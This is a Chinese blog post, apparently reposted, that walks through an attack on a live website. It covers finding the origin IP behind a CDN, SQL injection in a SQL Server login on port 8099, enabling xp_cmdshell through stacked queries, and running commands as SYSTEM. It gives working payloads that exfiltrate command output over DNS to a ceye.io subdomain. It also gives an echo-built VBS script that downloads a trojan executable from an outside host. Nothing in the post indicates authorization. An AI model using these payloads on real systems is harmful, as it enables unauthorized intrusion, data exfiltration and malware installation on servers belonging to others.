A-A+

记一次渗透实战

2019年05月22日文章转载暂无评论阅读 3,384 views 次

信息收集

用dirsearch扫了一波目录没有发现什么东西

直接用主站域名解析的ip访问发现主站是挂有cdn的

subDomainsBrute 扫描子域名

其中一个子域没挂CDN，由此找到网站的真实ip

得到真实ip后nmap扫描发现8099端口有个未知应用

访问发现是个WEB服务，一个登陆界面

漏洞利用

趁nmap还在工作的时候，简单浏览了下网站的功能，伪静态，整个网站也没有什么动态功能

遂把目光放在了nmap扫出的8099端口的web服务

常规测试admin/admin，提示密码错误

l3yx/xxxx，账号不存在

那么可以确定的是这里的账号和密码验证是分开的，确有admin账号。而且没有验证码，理论上可以爆破了，但我只手动测试了常见的几个弱口令，无果。

当输入一个单引号时(admin'/123123) ，惊喜来了，此处存在sqli！

于是很熟练的构造"万能密码"，admin/x' or 'x'='x--

然后反应过来了，之前测试发现账号密码验证是分开的，后台的账号密码验证肯定并非 where username=xxx and password=xxx 这种简单的sql语句，所以继续测试观察报错信息

账号密码的验证貌似是调用了储存过程，类似如 execute @result= verify 'xxx','xxx';

当账号密码为admin/11','xx'--时，页面返回正常

由于不是很熟悉sqlserver使用存储过程的注入，想尝试构造出能成功登陆的payload没有成功，就换种思路。

sqlserver是默认可以堆叠查询的，所以只要把之前的语句闭合，那么就可以在其后执行任意sql语句，能执行任意sql语句，那么同样利用存储过程就可以执行系统命令

第一步先用如下语句开启扩展存储过程

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

执行系统命令

exec master..xp_cmdshell "whoami"

这里是不会有回显的命令执行结果的，所以用ping命令来判断命令执行结果

命令执行结果DNS带外

有时候能执行命令却看不见结果也是很难受的，这里我还是想能够观察到命令执行结果，用到DNS带外的方法，其实就下面一条命令

cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.ceye.io && nslookup !FINAL!"

实际测试的时候爬了很多坑，当前执行目录可能没有写权限，换到D目录
目标服务器貌似没有nslookup，换成ping
&&这两个字符一定要编码，否则被WEB服务器当做参数分隔符了
生成的temp文件要删除，否则下次执行会失败
sqlserver中一对双引号其中的双引号用两个双引号代替

最后的paylaod

exec master..xp_cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";
exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!""";
exec master..xp_cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";

直接就是system权限

写入VBS下载木马

cmd命令行做不到下载文件，使用powershell容易被杀毒软件拦截，在该服务器上测试powershell命令也不成功，所以就用vbs来下载文件

vbs下载文件脚本:

iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2

用法:cscript D:/l.vbs http://xx.xx.xx.xx/x.exe D:/x.exe
所以先得利用sql注入执行命令把该脚本一点点写入文件，如下

echo iLocal = LCase(WScript.Arguments(1))>D:/l.vbs
echo iRemote = LCase(WScript.Arguments(0))>>D:/l.vbs
echo Set xPost = CreateObject(""Microsoft.XMLHTTP"")>>D:/l.vbs
echo xPost.Open ""GET"",iRemote,0 >>D:/l.vbs
echo xPost.Send() >>D:/l.vbs
echo Set sGet = CreateObject(""ADODB.Stream"")>>D:/l.vbs
echo sGet.Mode = 3 >>D:/l.vbs
echo sGet.Type = 1 >>D:/l.vbs
echo sGet.Open()>>D:/l.vbs
echo sGet.Write(xPost.responseBody)>>D:/l.vbs
echo sGet.SaveToFile iLocal,2 >>D:/l.vbs

注意以上命令是不能全部用&&连接起来一起输入的，因为参数限制最大长度为 128，还有在sqlserver中双引号内输入双引号是需要输入两个双引号的，并不是用\转义，如图